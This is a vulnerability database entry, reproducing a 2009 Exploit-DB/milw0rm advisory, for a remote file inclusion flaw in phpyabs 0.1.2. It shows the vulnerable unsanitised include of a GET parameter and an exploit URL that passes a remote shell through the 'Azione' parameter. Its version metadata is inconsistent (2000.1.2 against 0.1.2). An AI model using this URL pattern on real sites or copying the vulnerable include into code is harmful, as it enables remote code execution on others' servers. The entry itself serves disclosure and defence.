phpyabs 0.1.2 RFI Vulnerability

vendor:

phpyabs

by:

Arka69

7.5

CVSS

HIGH

Remote File Include (RFI)

CWE

Product Name: phpyabs

Affected Version From: 2000.1.2

Affected Version To: 2000.1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:phpyabs:phpyabs:0.1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

phpyabs 0.1.2 RFI Vulnerability

A Remote File Include (RFI) vulnerability exists in phpyabs 0.1.2. An attacker can exploit this vulnerability to include a remote file containing malicious code, resulting in arbitrary code execution on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of remote files.

Source

Exploit-DB raw data:

********************************************************************************
                                             phpyabs 0.1.2 RFI Vulnerability

********************************************************************************
FOUND BY: Arka69
BUG: Remote File Include (RFI)
CMS: phpyabs 0.1.2
SITE: http://exploita.altervista.org
********************************************************************************

VULNERABLE CODE: (phpyabs/moduli/libri/index.php)

  include($_GET['Azione'].".php");

********************************************************************************
RFI:

http://victim.com/phpyabs/moduli/libri/index.php?Azione=[SHELL]

# milw0rm.com [2009-02-06]